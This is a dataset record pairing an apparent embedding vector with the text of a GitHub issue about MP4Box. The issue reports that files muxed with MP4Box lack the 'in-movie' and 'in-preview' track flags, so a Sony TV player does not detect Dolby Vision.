0.012365490198135376, -0.011213095858693123, 0.0035178340040147305, -0.009984886273741722, 0.0242305975407362, -0.02788490056991577, 0.008650535717606544, -0.00818048045039177, -0.004636111203581095, -0.002899938728660345, -0.015906069427728653, -0.005538314115256071, -0.008923470973968506, -0.010333637706935406, -0.008703606203198433, 0.008241132833063602, 0.00018859078409150243, 0.011660406365990639, -0.003980307839810848, 0.013214622624218464, 0.014700603671371937, 0.009590646252036095, 0.01792275719344616, -0.007225206587463617, -0.026277612894773483, -0.0051023755222558975, -0.0053828926756978035, 0.019605860114097595, 0.02853691205382347, 0.003487507812678814, -0.006182745099067688, 0.009628554806113243, -0.012047065421938896, -0.014693022705614567, 0.0003098954039160162, 0.000004771779003931442, -0.007119065150618553, 0.008688443340361118, 0.00714939134195447, 0.008218388073146343, 0.04081900417804718, 0.026141146197915077, 0.00010294307867297903, 0.006224443204700947, 0.00909026525914669, -0.015345034189522266, -0.014723348431289196, -0.01912064105272293, -0.0024090339429676533, 0.009605810046195984, 0.007065994199365377, -0.0018783262930810452, 0.011539102531969547, -0.019044825807213783, -0.00017271692922804505, 0.006770314183086157, 0.003811618546023965, 0.0013381416210904717, 0.0022365539334714413, 0.014753674156963825, -0.0019674093928188086, -0.0039840987883508205, -0.007627028040587902, 0.007551212795078754, -0.011827200651168823, -0.0017030031885951757, 0.013442068360745907, 0.00021678462508134544, -0.004310104995965958, 0.02009107731282711, -0.003999261651188135, -0.008733932860195637, 0.0011457600630819798, -0.016815852373838425, -0.00955273862928152, 0.0019408739171922207, 0.009325292892754078, -0.008832492865622044, 0.012494375929236412, 0.013267693109810352, -0.007975778542459011, -0.006777895614504814, 0.00954515766352415, -0.0028354956302791834, 0.010462523438036442, -0.008263877592980862, -0.027536148205399513, 0.008294203318655491, -0.010121354833245277, -0.017771126702427864, 0.004874929320067167, 0.005909809377044439, -0.005310867913067341, -0.009006868116557598, -0.015799926593899727, -0.0178621057420969, 0.0032524801790714264, -0.012577773071825504, 0.015390523709356785, 0.02955283783376217, -0.001199778518639505, 0.01430636364966631, -0.003733907826244831, -0.00002638730984472204, -0.007156972773373127, 0.000335009244736284, -0.027384517714381218, -0.022107766941189766, 0.02319950982928276, 0.01666422188282013, -0.0106672253459692, 0.0010462523205205798, -0.0016271878266707063, -0.024852285161614418, -0.0021967508364468813, 0.005606547929346561, 0.0004406769585330039, -0.008605046197772026, 0.003203200176358223, 0.019029662013053894, 0.018741564825177193, 0.04048541933298111, -0.010363963432610035, -0.0017115323571488261, -0.011190351098775864, -0.019226782023906708, -0.002335113938897848, 0.022517170757055283, 0.007274486590176821, 0.012964431196451187, 0.0022517170291393995, 0.02040950208902359, 0.009135754778981209, 0.014291200786828995, 0.0034571816213428974, -0.010652062483131886, 0.00802126806229353, -0.00007599308446515352, -0.017119115218520164, -0.007274486590176821, 0.011675570160150528, 0.0047536250203847885, 0.025792395696043968, 0.012774893082678318, -0.02257782220840454, -0.010644480586051941, -0.008066757582128048, -0.02160738594830036, 0.029097946360707283, 0.03135724365711212, -0.010470105335116386, 0.029386045411229134, 0.010545920580625534, 0.011721058748662472, -0.000045133849198464304, -0.0001560138480272144, 0.0030155570711940527, 0.014397342689335346, -0.013100898824632168, -0.004924209322780371, -0.006459471303969622, 0.010727877728641033, -0.012365490198135376, -0.017437539994716644, -0.0067020803689956665, -0.0022043325006961823, 0.020909884944558144, -0.019893957301974297, 0.00034448617952875793, 0.01443525031208992, -0.004738461691886187, -0.00786205567419529, -0.02074309065937996, -0.0006695446791127324, 0.015473920851945877, 0.0020470155868679285, -0.00681959418579936, 0.01570894941687584, 0.012031902559101582, -0.000703187717590481, 0.00388553855009377, -0.019302597269415855, 0.002990917069837451, 0.01050801295787096, 0.022502006962895393, 0.0007278277189470828, 0.023806031793355942, 0.007763495668768883, 0.007274486590176821, 0.012145625427365303, -0.0064367265440523624, 0.015860579907894135, -0.006486006546765566, 0.007012923248112202, 0.009029612876474857, 0.008028849959373474, -0.02917376160621643, 0.0044882711954414845, -0.009795348159968853, -0.0067020803689956665, -0.010978068225085735, -0.0077559142373502254, -0.0020716555882245302, 0.010932578705251217, 0.0036050216294825077, -0.01567862182855606, -0.015951557084918022, -0.026899300515651703, 0.012229022569954395, -0.00033074463135562837, 0.0016366647323593497, 0.02101602591574192, 0.006349538918584585, 0.009287385269999504, 0.007039458956569433, 0.01003037579357624, -0.0004596307990141213, -0.009082683362066746, -0.017210092395544052, -0.0010832123225554824, 0.0028961477801203728, 0.010303311049938202, -0.012494375929236412, -0.00137320626527071, 0.007930289953947067, -0.0005269169341772795, 0.0017162708099931479, -0.012418560683727264, -0.013646770268678665, 0.017043299973011017, 0.023699890822172165, 0.007448861841112375, 0.013813563622534275, -0.011614917777478695, 0.024078967049717903, -0.020242709666490555, 0.0033264001831412315, -0.02072792686522007, 0.020818905904889107, -0.015815090388059616, 0.017346560955047607, 0.02788490056991577, 0.007877218537032604, 0.01131165586411953, -0.021107004955410957, 0.00231995084322989, -0.02821848727762699, -0.020879557356238365, -0.01972716487944126, 0.009302548132836819, 0.013487557880580425, -0.0038760616444051266, -0.014359434135258198, 0.008915890008211136, 0.0009680677321739495, -0.008642954751849174, 0.005276751238852739, -0.005432172678411007, 0.01884770579636097, -0.01414715126156807, -0.0009145231451839209, 0.0030136615969240665, 0.010098610073328018, 0.007141809444874525, 0.028082020580768585, 0.010621735826134682, -0.002998498734086752, -0.018362486734986305, 0.013768074102699757, -0.002210018690675497, -0.011978831142187119, -0.019590696319937706, 0.007680098991841078, -0.009363200515508652, -0.00009583539213053882, -0.007846892811357975, -0.012168370187282562, -0.006425354164093733, -0.014503483660519123, 0.0035652185324579477, 0.012994757853448391, -0.0005870953900739551, -0.010401871055364609, 0.023275325074791908, -0.0005254953866824508, -0.032782573252916336, -0.013078154064714909, -0.016542917117476463, 0.0036770463921129704, 0.013442068360745907, 0.014427668415009975, -0.01443525031208992, 0.02639891766011715, -0.002818437060341239, -0.015860579907894135, 0.01919645629823208, -0.011880271136760712, -0.008347274735569954, -0.01523889321833849, -0.006160000339150429, -0.000030326154956128448, 0.006656591314822435, 0.0017484923591837287, -0.03805932402610779, 0.000958590826485306, -0.003495089476928115, -0.03178181126713753, -0.014101662673056126, 0.0006373231299221516, 0.0060728127136826515, -0.01112969871610403, 0.0020413293968886137, 0.0025568739511072636, -0.014685440808534622, 0.00681959418579936, -0.003999261651188135, -0.021531570702791214, 0.0027085046749562025, 0.010652062483131886, -0.005906018894165754, -0.0029605908785015345, -0.024564186111092567, 0.012820382602512836, -0.02066727541387081, -0.008438252843916416, 0.0016537231858819723, -0.002170215593650937, -0.0010870031546801329, -0.008377600461244583, 0.015299545601010323, -0.020576296374201775, -0.002899938728660345, 0.011758966371417046, 0.021213145926594734, 0.0026668063364923, 0.010561083443462849, 0.007786240428686142, -0.005223680287599564, 0.004363175481557846, -0.004014424979686737, 0.016755200922489166, 0.0029359508771449327, -0.019621022045612335, 0.00815773569047451, 0.022138092666864395, 0.008703606203198433, 0.002998498734086752, 0.02727837674319744, -0.004317686427384615, -0.012592935934662819, 0.0248067956417799, -0.025307176634669304, -0.003277120180428028, -0.01002279482781887, 0.0008515015942975879, -0.028991805389523506, -0.01701297238469124, 0.010576246306300163, 0.0019408739171922207, -0.01601221039891243, -0.001982572488486767, 0.036543019115924835, 0.003953772597014904, 0.01459446270018816, -0.03202442079782486, 0.0319637693464756, 0.007467815652489662, 0.017755964770913124, -0.020015262067317963, -0.01288861595094204, -0.008824910968542099, -0.016376124694943428, 0.0004913784796372056, 0.034086599946022034, -0.006959852762520313, -0.009469342418015003, 0.022077441215515137, -0.028506586328148842, -0.008195643313229084, -0.02297206223011017, -0.004605785012245178, -0.013730166479945183, -0.006959852762520313, 0.011167606338858604, -0.012494375929236412, -0.00802126806229353, 0.009605810046195984, 0.005261587910354137, 0.0010045538656413555, -0.002486744662746787, -0.009954560548067093, 0.005011397413909435, 0.03320714086294174, -0.013760493136942387, -0.011887853033840656, 0.013608862645924091, -0.025064567103981972, -0.008286622352898121, -0.015587643720209599, 0.0015400000847876072, 0.011084210127592087, -0.005030351225286722, 0.009901490062475204, -0.013244948349893093, -0.011508775874972343, -0.01476125605404377, -0.004416246432811022, 0.0034116925671696663, 0.0188780315220356, 0.0013542523374781013, 0.004890092648565769, -0.001531470799818635, -0.0018385231960564852, 0.0026819694321602583, -0.022411029785871506, -0.012835545465350151, -0.0041281478479504585, -0.006190326530486345, 0.009294966235756874, 0.002274461556226015, 0.0037244309205561876, 0.0017882954562082887, -0.02045499160885811, 0.01757400669157505, -0.0079909423366189, -0.005272960290312767, -0.005454917438328266, 0.012259348295629025, -0.005284332670271397, -0.014973538927733898, -0.022790106013417244, 0.0005164923495613039, -0.010424615815281868, -0.004511015489697456, -0.005231261719018221, -0.016740037128329277, 0.019878795370459557, -0.019257109612226486, 0.005962880328297615, 0.016103189438581467, 0.01912064105272293, -0.0027217725291848183, 0.011895434930920601, 0.017649821937084198, 0.011251003481447697, -0.012759730219841003, -0.022047115489840508, -0.0046740188263356686, -0.007808985188603401, 0.01825634576380253, -0.0028013787232339382, 0.012191114947199821, -0.021789342164993286, 0.032752249389886856, -0.011319237761199474, 0.021425429731607437, -0.0219864621758461, 0.025034241378307343, 0.009529994800686836, -0.0026971325278282166, 0.022471681237220764, -0.025019077584147453, -0.004734671209007502, -0.012896197848021984, -0.0015703262761235237, -0.007983360439538956, 0.0008458154043182731, -0.012934105470776558, 0.008089502342045307, 0.0154056865721941, 0.02066727541387081, 0.0037718156818300486, -0.00044541541137732565, -0.013843890279531479, -0.0012130462564527988, 0.0060728127136826515, 0.003510252572596073, 0.004567877389490604, -0.001942769275046885, -0.0004380707978270948, 0.011076628230512142, 0.00024260923964902759, -0.011652825400233269, 0.026687016710639, 0.007081157062202692, -0.008059175685048103, 0.003070523263886571, 0.007175926584750414, -0.009234314784407616, 0.006163791287690401, 0.00254739704541862, 0.017771126702427864, -0.004454154055565596, -0.011690733022987843, 0.0036448247265070677, -0.01727074570953846, 0.01099323108792305, 0.0009600123739801347, -0.0027558894362300634, -0.008726350963115692, 0.0242305975407362, 0.022668801248073578, 0.004829440265893936, -0.0139576131477952, -0.006667963229119778, -0.022168420255184174, -0.015633132308721542, -0.008680862374603748, -0.04551956057548523, -0.02319950982928276, -0.012494375929236412, -0.010235077701508999, 0.001008344697766006, -0.0190903153270483, -0.023715052753686905, 0.012441305443644524, -0.02479163184762001, 0.01660357043147087, 0.025853047147393227, -0.013646770268678665, -0.006201698910444975, -0.005200935527682304, -0.004226707853376865, 0.005894646514207125, -0.0063571203500032425, 0.004772578831762075, -0.0008785108220763505, -0.001889698556624353, 0.004166055470705032, -0.015830252319574356, -0.012077391147613525, -0.003586067818105221, -0.0037642340175807476, -0.005583803169429302, -0.008089502342045307, 0.026171471923589706, 0.007524677086621523, -0.02013656683266163, -0.000015111250831978396, 0.016846179962158203, -0.006144837476313114, -0.019560370594263077, 0.026489896699786186, 0.010864345356822014, 0.004916627891361713, 0.009037194773554802, 0.00973469577729702, -0.023032715544104576, 0.0014888247242197394, 0.00729723135009408, -0.013578535988926888, -0.009605810046195984, -0.03854454308748245, 0.015284382738173008, -0.011031138710677624, 0.018104715272784233, 0.005833994131535292, -0.01238065306097269, 0.007354092784225941, -0.013290437869727612, 0.014056173153221607, 0.011577010154724121, 0.007418535649776459, -0.006565612740814686, -0.02098570019006729, 0.013040246441960335, -0.00005138269625604153, -0.010811274871230125, -0.019605860114097595, 0.019332924857735634, -0.012759730219841003, 0.012782474979758263, -0.019924284890294075, 0.01725558191537857, 0.007414745166897774, 0.0021777970250695944, 0.014374597929418087, 0.004056123085319996, -0.013146388344466686, 0.010576246306300163, -0.003335877088829875, -0.020212382078170776, 0.00893105287104845, -0.014078917913138866, 0.024973589926958084, -0.001743753906339407, 0.00986358243972063, -0.009037194773554802, -0.020197220146656036, -0.009636135771870613, 0.0071872989647090435, 0.021410265937447548, -0.001021612319163978, 0.008627790957689285, 0.004169846419245005, -0.019590696319937706, -0.0021057724952697754, 0.0033813663758337498, 0.007558794226497412, -0.024245761334896088, 0.02136477641761303, 0.0026175263337790966, 0.0029094156343489885, 0.013131225481629372, -0.005238843150436878, 0.008430670946836472, 0.031205613166093826, 0.02354826033115387, -0.005943926516920328, 0.03287355229258537, -0.010166843421757221, 0.002210018690675497, 0.02069760113954544, 0.019287435337901115, 0.012153206393122673, -0.0028866708744317293, 0.003205095650628209, 0.0002772000152617693, -0.015617970377206802, 0.004484480246901512, 0.014965957961976528, -0.0242305975407362, -0.021470917388796806, 0.0007647877209819853, 0.0030212432611733675, -0.02788490056991577, -0.0039044925943017006, -0.026232125237584114, -0.005606547929346561, -0.03175148367881775, 0.011486031115055084, 0.005693735554814339, -0.011417797766625881, -0.0075360494665801525, -0.0013286647154018283, 0.005754387937486172, 0.002797587774693966, 0.016876505687832832, 0.008536812849342823, 0.006948480382561684, 0.0004894831217825413, 0.022441355511546135, -0.021774180233478546, 0.01427603792399168, 0.013699840754270554, 0.013199458830058575, 0.005473871249705553, -0.011842363514006138, -0.0015816985396668315, -0.009605810046195984, 0.012350326403975487, 0.004598203115165234, 0.012191114947199821, 0.0005923077114857733, 0.0020261663012206554, 0.011895434930920601, -0.023320812731981277, 0.003620184725150466, 0.0076763080433011055, 0.00799852330237627, 0.022395865991711617, 0.009075102396309376, 0.028051692992448807, 0.004150892607867718, -0.003030720166862011, 0.016831016167998314, -0.004924209322780371, 0.0023768125101923943, -0.0021645294036716223, -0.027824247255921364, -0.004238080233335495, 0.02515554614365101, -0.01003037579357624, 0.023078205063939095, 0.013298018835484982, -0.008756677620112896, 0.04009117931127548, 0.016861341893672943, 0.0013694154331460595, 0.006482215598225594, -0.006652800366282463, 0.0021190401166677475, -0.008362437598407269, -0.016254819929599762, -0.0032733294647186995, -0.010265403427183628, 0.025868210941553116, 0.009363200515508652, 0.0058112493716180325, 0.00831694807857275, -0.014063754118978977, -0.010227495804429054, -0.006046277470886707, -0.00258720014244318, 0.019681675359606743, -0.01347997598350048, -0.002989021595567465, -0.006952271331101656, -0.030644580721855164, 0.02233521267771721, -0.008347274735569954, 0.009749858640134335, -0.009992468170821667, 0.010015212930738926, 0.025928862392902374, -0.014905305579304695, 0.015307126566767693, 0.02641408145427704, -0.005598966497927904, -0.010477686300873756, 0.01222144067287445, 0.0019114954629912972, -0.00046508002560585737, 0.002268775599077344, -0.015443594194948673, 0.026004677638411522, 0.0017257478320971131, -0.00034401234006509185, 0.006834757048636675, -0.027232887223362923, -0.012433723546564579, -0.012320000678300858, 0.014928050339221954, 0.010326055809855461, 0.010659643448889256, 0.016800690442323685, 0.004435200244188309, 0.02601984143257141, -0.02482195757329464, -0.0025094894226640463, 0.016512591391801834, 0.012486794963479042, -0.005379101727157831, -0.02820332534611225, -0.0018982278415933251, 0.002215704647824168, 0.0159818846732378, 0.012501957826316357, 0.012661170214414597, -0.000573827710468322, -0.007338929455727339, 0.018407976254820824, -0.009355618618428707, 0.012342745438218117, 0.015936395153403282, -0.016239656135439873, 0.0016679385444149375, 0.011978831142187119, -0.012979594990611076, -0.00940869003534317, 0.007077366579324007, -0.004044751171022654, -0.0025947815738618374, 0.00896137859672308, -0.00020328001119196415, -0.006607311312109232, 0.014329108409583569, -0.03078104741871357, 0.005299495533108711, -0.01949971728026867, -0.043184444308280945, -0.006690707989037037, 0.01021233294159174, 0.028703706339001656, -0.01286587119102478, 0.0007633661734871566, 0.015428431332111359, -0.011099372990429401, -0.02259298600256443, 0.004738461691886187, 0.008324529975652695, -0.02071276493370533, 0.0053828926756978035, 0.010439778678119183, -0.02479163184762001, 0.03041713312268257, 0.015291963703930378, -0.0007643139106221497, 0.02201678976416588, 0.008263877592980862, -0.004109194036573172, -0.005360147915780544, -0.015951557084918022, 0.012903778813779354, 0.021091841161251068, -0.021501244977116585, -0.0057316431775689125, -0.017816616222262383, -0.003045883262529969, -0.017392050474882126, -0.0029416370671242476, 0.013138806447386742, -0.0048332312144339085, -0.02319950982928276, -0.01667938567698002, -0.010955323465168476, -0.01366193313151598, 0.02536782994866371, 0.007388209458440542, 0.013874216005206108, 0.008385182358324528, 0.017983410507440567, 0.001472713891416788, 0.005087212659418583, 0.011713477782905102, -0.03129659220576286, 0.004010634031146765, -0.0017598647391423583, -0.024640001356601715, -0.01272182259708643, -0.013707422651350498, -0.00038926463457755744, 0.014367016032338142, -0.024988751858472824, -0.008134990930557251, 0.015185822732746601, -0.01666422188282013, -0.03244898468255997, -0.0015115693677216768, 0.0044731078669428825, 0.0016963692614808679, -0.010720295831561089, -0.007028086576610804, -0.010636898688971996, 0.003606917103752494, 0.010439778678119183, 0.017983410507440567, 0.03305551037192345, 0.020925046876072884, 0.00486734788864851, 0.01302508357912302, -0.003686523297801614, -0.00818048045039177, 0.02194097265601158, -0.005189563147723675, 0.007050831336528063, 0.007119065150618553, 0.018574770539999008, 0.024912936612963676, -0.016148677095770836, 0.004378338810056448, 0.0007922708173282444, -0.008597465232014656, -0.017634660005569458, -0.020636949688196182, 0.0021247263066470623, 0.00407507736235857, 0.00579987745732069, -0.025276850908994675, -0.006812012754380703, 0.001916233915835619, 0.014101662673056126, 0.008059175685048103, 0.012039483524858952, -0.005235052667558193, 0.03478410094976425, -0.005011397413909435, 0.02356342226266861, 0.00770284328609705, 0.011569428257644176, -0.0043480126187205315, -0.01972716487944126, 0.021470917388796806, -0.006884037051349878, 0.011341982521116734, -0.007255532778799534, -0.004249452613294125, -0.003961354028433561, 0.008817330002784729, -0.036906931549310684, 0.007589120417833328, 0.008203225210309029, 0.017680149525403976, -0.004882511217147112, 0.013176714070141315, 0.018680911511182785, 0.01462478842586279, 0.00041224618325941265, -0.0154056865721941, 0.010864345356822014, -0.010470105335116386, -0.0159818846732378, 0.010454942472279072, 0.013646770268678665, 0.017483029514551163, -0.021228309720754623, 0.004848394077271223, -0.017953084781765938, -0.02163771167397499, -0.03241866081953049, 0.02667185291647911, 0.002640270860865712, 0.0036713602021336555, 0.03266127035021782, 0.011053883470594883, 0.000968541600741446, -0.003752861637622118, 0.004022006411105394, -0.009211570024490356, 0.007695261854678392, 0.0037433847319334745, -0.004583040252327919, 0.010174425318837166, -0.010871926322579384, -0.002282043220475316, -0.030553601682186127, -0.019211620092391968, 0.03896911069750786, -0.016436776146292686, 0.016527755185961723, -0.02483712136745453, -0.0010604677954688668, 0.016118351370096207, 0.00028762462898157537, -0.005852947942912579, -0.018013736233115196, 0.01661873236298561, 0.004749834071844816, 0.003639138536527753, -0.01881738007068634, -0.0019124432001262903, -0.0024166156072169542, -0.009446597658097744, 0.015284382738173008, -0.008749095723032951, 0.020621785894036293, -0.016755200922489166, 0.014480738900601864, -0.0019181292736902833, 0.011258585378527641, -0.006891618948429823, 0.004291151184588671, -0.00909784622490406, -0.01910547725856304, 0.0035121478140354156, -0.0046929726377129555, -0.024397391825914383, -0.026687016710639, 0.020849231630563736, 0.011395053006708622, 0.005238843150436878, 0.024715816602110863, 0.01757400669157505, 0.0025890956167131662, -0.0010964800603687763, -0.005489034112542868, -0.004681600257754326, 0.014988702721893787, -0.004219126421958208, 0.008582302369177341, -0.001617710804566741, 0.01301750261336565, 0.012987175956368446, -0.01757400669157505, -0.020151730626821518, -0.028082020580768585, -0.00098180933855474, 0.0007534153992310166, -0.008195643313229084, -0.02034885063767433, -0.01427603792399168, 0.015815090388059616, -0.006588357035070658, 0.005337403155863285, 0.003269538516178727, 0.017634660005569458, 0.006679335609078407, -0.019332924857735634, 0.023684727028012276, 0.01918129250407219, -0.008286622352898121, 0.00034709234023466706, 0.0067854770459234715, -0.01489014271646738, -0.01178929302841425, 0.0007865846855565906, 0.00032292617834173143, 0.0012812800705432892, -0.018680911511182785, -0.0032316308934241533, 0.020030425861477852, -0.011031138710677624, 0.009166080504655838, 0.02171352691948414, -0.0036694647278636694, -0.014404923655092716, 0.0022896246518939734, 0.008468578569591045, 0.00540184648707509, 0.020925046876072884, -0.0008860923699103296, 0.001638560090214014, 0.02416994608938694, 0.0194542296230793, 0.010879508219659328, -0.005906018894165754, 0.014503483660519123, -0.016558080911636353, 0.009954560548067093, -0.014859816059470177, 0.009749858640134335, -0.012191114947199821, -0.009241895750164986, -0.012357908301055431, -0.023972826078534126, 0.017528517171740532, 0.022062277421355247, -0.010917415842413902, -0.0017229047371074557, 0.008256295695900917, -0.02130412496626377, 0.0037490709219127893, 0.013912123627960682, 0.02171352691948414, 0.008438252843916416, 0.018665749579668045, 0.011455705389380455, 0.0035538463853299618, -0.004723298829048872, 0.009931815788149834, -0.007922708056867123, -0.0026630156207829714, 0.009022030979394913, 0.01575443707406521, -0.006508751306682825, -0.009211570024490356, -0.002554978709667921, -0.013237366452813148, -0.0073920004069805145, 0.023275325074791908, -0.004230498801916838, 0.016209330409765244, -0.0015295754419639707, -0.019742326810956, -0.025352666154503822, -0.013555791229009628, 0.008430670946836472, 0.007608074229210615, 0.013040246441960335, -0.020864395424723625, 0.00706978514790535, -0.04012150317430496, 0.0016868923557922244, -0.005955298896878958, -0.010250240564346313, 0.01021233294159174, -0.0364520400762558, -0.007721797097474337, -0.023290487006306648, -0.013419323600828648, -0.017513355240225792, -0.00518577266484499, -0.005454917438328266, -0.004636111203581095, 0.03805932402610779, -0.004446572624146938, 0.011516357772052288, -0.0008519754046574235, 0.013904542662203312, 0.016740037128329277, -0.005962880328297615, 0.00318235089071095, -0.0020185846369713545, 0.00924947764724493, 0.004583040252327919, -0.015178240835666656, 0.008301785215735435, 0.033116161823272705, 0.006796849425882101, 0.007687680423259735, 0.0029947077855467796, -0.021425429731607437, -0.0034173785243183374, -0.008688443340361118, -0.002500012516975403, 0.023972826078534126, -0.0065011694096028805, -0.0014329107943922281, 0.004033378791064024, -0.004359384998679161, -0.00973469577729702, -0.010682388208806515, 0.009674043394625187, -0.001803458551876247, -0.030659742653369904, -0.0038969109300523996, 0.015890905633568764, -0.018423140048980713, -0.020788580179214478, 0.00880216620862484, -0.012918942607939243, -0.018620260059833527, -0.008658117614686489, 0.0033586216159164906, -0.008013686165213585, -0.0012509538792073727, -0.004033378791064024, -0.006542867980897427, -0.030947841703891754, -0.0016489847330376506, -0.005974252708256245, -0.0027350401505827904, -0.0025625601410865784, -0.01948455534875393, 0.017103951424360275, -0.002115249400958419, 0.008400345221161842, 0.0015978093724697828, 0.02477646991610527, 0.0038040371146053076, -0.021455755457282066, 0.010583828203380108, -0.013282855972647667, 0.018893195316195488, 0.002619421575218439, -0.01689166948199272, -0.007043249439448118, -0.004567877389490604, -0.005208517424762249, -0.01163008064031601, -0.006288886535912752, -0.024564186111092567, -0.005257797427475452, -0.01849895529448986, -0.013396578840911388, -0.013100898824632168, 0.0010500431526452303, 0.016194166615605354, 0.01757400669157505, 0.0034268556628376245, 0.004116775467991829, -0.010098610073328018, 0.02664152719080448, 0.0029416370671242476, -0.0021796924993395805, 0.010409452952444553, -0.006315421778708696, -0.004234289284795523, 0.02200162597000599, -0.0053222402930259705, 0.05061435326933861, 0.007467815652489662, 0.0019484554650261998, -0.01037912629544735, -0.007664935663342476, -0.015906069427728653, 0.0017390154534950852, 0.0005363938980735838, -0.011903015896677971, -0.02662636525928974, -0.01664905995130539, 0.0007145600393414497, 0.012168370187282562, 0.005125120282173157, -0.014700603671371937, 0.004162264987826347, 0.019241945818066597, 0.00006319923704722896, -0.007054621819406748, -0.014503483660519123, 0.01050801295787096, -0.0019380308222025633, 0.006144837476313114, -0.006929526571184397, 0.005398055538535118, 0.012767311185598373, -0.006982597056776285, -0.013108480721712112, 0.023760542273521423, -0.04172879084944725, 0.018741564825177193, -0.015602806583046913, 0.014564136043190956, 0.00005967500328551978, 0.0013030769769102335, 0.02670218050479889, 0.013624025508761406, 0.027050931006669998, -0.01018958818167448, -0.0188780315220356, 0.026171471923589706, 0.00833969283849001, 0.02391217276453972, 0.007073575630784035, 0.008362437598407269, -0.013146388344466686, 0.001398793887346983, -0.026687016710639, 0.01695232093334198, -0.014495902694761753, -0.004522387869656086, -0.004185009282082319, -0.0018025108147412539, 0.00572027126327157, -0.010659643448889256, -0.013836308382451534, 0.0036448247265070677, -0.006516332738101482, 0.014844653196632862, -0.009560320526361465, -0.016376124694943428, -0.0033207139931619167, 0.008430670946836472, 0.006717243231832981, -0.018893195316195488, 0.010341218672692776, 0.03132691979408264, 0.011334400624036789, -0.007517095655202866, 0.007175926584750414, 0.008976542390882969, -0.009848418645560741, 0.002314264653250575, 0.011986413039267063, -0.024336740374565125, -0.029386045411229134, 0.012327582575380802, 0.03017452545464039, -0.004772578831762075, 0.015890905633568764, -0.0021588432136923075, -0.008521649986505508, -0.01730107143521309, -0.011334400624036789, 0.0028411815874278545, -0.013950031250715256, 0.0016679385444149375, 0.010682388208806515, -0.004586831200867891, 0.007793821860104799, -0.019909121096134186, 0.03329811990261078, -0.010341218672692776, -0.022759780287742615, -0.012069810181856155, -0.007710425183176994, 0.005356357432901859, 0.004010634031146765, 0.0025208615697920322, 0.00242798775434494, -0.009833255782723427, 0.013593698851764202, -0.004044751171022654, -0.0034003201872110367, -0.019287435337901115, -0.00014416770136449486, -0.007225206587463617, -0.003011766355484724, -0.009166080504655838, 0.00479911407455802, -0.026899300515651703, 0.023745380342006683, -0.013995520770549774, 0.010159262455999851, 0.01178929302841425, 0.019939446821808815, 0.018013736233115196, 0.018301835283637047, -0.0024677908513695, 0.004764997400343418, -0.0003170030831824988, -0.019545206800103188, -0.0025227570440620184, 0.02353309653699398, -0.000995076959952712, -0.009166080504655838, -0.00785447470843792, 0.014222966507077217, 0.008999286219477654, -0.01068997010588646, -0.007327557075768709, -0.009871163405478, 0.005852947942912579, 0.031144961714744568, 0.012805218808352947, 0.029931915923953056, 0.008809748105704784, 0.0013675200752913952, -0.02297206223011017, -0.021789342164993286, -0.025307176634669304, 0.029583165422081947, -0.005045514088124037, -0.0032486894633620977, -0.010485268197953701, 0.002435569418594241, -0.020515644922852516, 0.0002956800162792206, 0.0008633477264083922, -0.003912074025720358, 0.015572480857372284, 0.0011855631601065397, 0.006872665137052536, -0.015936395153403282, -0.01272182259708643, 0.02761196531355381, 0.01730107143521309, 0.011539102531969547, 0.00039092308725230396, -0.009105428121984005, -0.002494326326996088, -0.012979594990611076, -0.0058112493716180325, 0.024579349905252457, 0.015178240835666656, 0.005189563147723675, 0.0092570586130023, 0.004912837408483028, 0.002029957016929984, -0.006918154191225767, 0.012297255918383598, 0.005500406492501497, 0.025822721421718597, -0.012297255918383598, 0.02421543560922146, -0.002913206350058317, 0.009234314784407616, -0.01570894941687584, 0.026853810995817184, 0.00006586461677215993, -0.00973469577729702, 0.008324529975652695, -0.00833969283849001, -0.00392723735421896, -0.006038695573806763, 0.008597465232014656, -0.014457994140684605, -0.00556105887517333, -0.0003198461781721562, 0.010310892947018147, -0.01664905995130539, -0.006554240360856056, 0.00356900948099792, -0.0079909423366189, -0.01037912629544735, 0.015178240835666656, 0.004620947875082493, -0.017953084781765938, 0.006918154191225767, -0.022547496482729912, -0.0020337477326393127, -0.009302548132836819, 0.0033131325617432594, 0.0050985850393772125 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Other Android TV players (such as JustPlayer) recognize in the Dolby Vision file. With this video file, the file collected by the MP4MUXER program (DLB_MP4BASE \ MP4MUXER) from the same components (H265 and AC3) is determined on the built-in Sony TV player as a full Dolby Vision. Comparison Output MP4Info (Bento4 \ Mp4Info) on the problematic and normal files showed that the difference in them is only that the file made using MP4Box does not have the "in-movie" and "in-preview" flags in contrast to the file, Made using MP4MUXER. Conclusion for MP4Box: Found 2 Tracks. Track 1: Flags: 1 Enabled ID: 1. Type: Video. Conclusion for MP4MUXER: Found 2 Tracks. Track 1: Flags: 15 Enabled In-Movie In-Preview ID: 1. Type: Video. Is it possible to add to the MP4BOX program to add the options "in-movie" and "in-preview" for the import of video and audio components?
Video MP4 file with Dolby Vision Profile 8.1, created using MP4Box, is not determined by the built-in Sony TV player as video with Dolby Vision
https://api.github.com/repos/gpac/gpac/issues/2076/comments
19
2022-01-27T13:46:05
2022-01-28T12:49:25Z
https://github.com/gpac/gpac/issues/2076
1,116,234,011
2,076
false
This is a GitHub Issue repo:gpac owner:gpac Title : Video MP4 file with Dolby Vision Profile 8.1, created using MP4Box, is not determined by the built-in Sony TV player as video with Dolby Vision Issue date: --- start body --- Other Android TV players (such as JustPlayer) recognize in the Dolby Vision file. With this video file, the file collected by the MP4MUXER program (DLB_MP4BASE \ MP4MUXER) from the same components (H265 and AC3) is determined on the built-in Sony TV player as a full Dolby Vision. Comparison Output MP4Info (Bento4 \ Mp4Info) on the problematic and normal files showed that the difference in them is only that the file made using MP4Box does not have the "in-movie" and "in-preview" flags in contrast to the file, Made using MP4MUXER. Conclusion for MP4Box: Found 2 Tracks. Track 1: Flags: 1 Enabled ID: 1. Type: Video. Conclusion for MP4MUXER: Found 2 Tracks. Track 1: Flags: 15 Enabled In-Movie In-Preview ID: 1. Type: Video. Is it possible to add to the MP4BOX program to add the options "in-movie" and "in-preview" for the import of video and audio components? --- end body ---
1,143
